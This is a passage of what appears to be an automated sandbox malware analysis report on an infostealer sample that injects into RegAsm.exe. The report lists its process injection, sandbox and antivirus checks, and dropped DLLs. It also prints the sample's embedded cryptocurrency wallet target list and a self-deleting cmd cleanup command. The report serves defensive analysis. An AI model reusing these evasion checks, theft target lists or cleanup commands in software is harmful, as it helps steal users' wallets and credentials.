                  Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: softokn3.dll.3.dr Static PE information: section name: .00cfg
                  Source: softokn3[1].dll.3.dr Static PE information: section name: .00cfg
                  Source: freebl3.dll.3.dr Static PE information: section name: .00cfg
                  Source: freebl3[1].dll.3.dr Static PE information: section name: .00cfg
                  Source: mozglue.dll.3.dr Static PE information: section name: .00cfg
                  Source: mozglue[1].dll.3.dr Static PE information: section name: .00cfg
                  Source: msvcp140.dll.3.dr Static PE information: section name: .didat
                  Source: msvcp140[1].dll.3.dr Static PE information: section name: .didat
                  Source: sqlx[1].dll.3.dr Static PE information: section name: .00cfg
                  Source: nss3.dll.3.dr Static PE information: section name: .00cfg
                  Source: nss3[1].dll.3.dr Static PE information: section name: .00cfg
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006E7534 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004191D5 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C6FB536 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\GHIJJEGDBFII\nss3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\GHIJJEGDBFII\freebl3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\GHIJJEGDBFII\vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\GHIJJEGDBFII\softokn3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\GHIJJEGDBFII\msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\GHIJJEGDBFII\mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\GHIJJEGDBFII\nss3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\GHIJJEGDBFII\freebl3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\GHIJJEGDBFII\vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\GHIJJEGDBFII\softokn3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\GHIJJEGDBFII\msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\GHIJJEGDBFII\mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Source: RegAsm.exe Binary or memory string: DIR_WATCH.DLL
                  Source: RegAsm.exe Binary or memory string: SBIEDLL.DLL
                  Source: RegAsm.exe Binary or memory string: API_LOG.DLL
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\GHIJJEGDBFII\nss3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\GHIJJEGDBFII\freebl3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\GHIJJEGDBFII\softokn3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 6.2 %
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 2576 Thread sleep count: 88 > 30
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F81B2 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040FE81 GetSystemInfo,wsprintfA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: RegAsm.exe, 00000003.00000002.2040315374.0000000003465000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006E7B35 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F2E07 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F0040 mov ecx, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F2E4B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FB84A GetProcessHeap,
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006E7810 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006E7C91 SetUnhandledExceptionFilter,
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006EC606 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041E438 SetUnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C6FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C6FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match File source: Process Memory Space: file.exe PID: 6856, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02CD018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BF6008
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8F4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006E7630 cpuid
                  Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW,
                  Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                  Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW,
                  Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW,
                  Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006E7A2F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  Source: Yara match File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match File source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match File source: 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: file.exe PID: 6856, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet 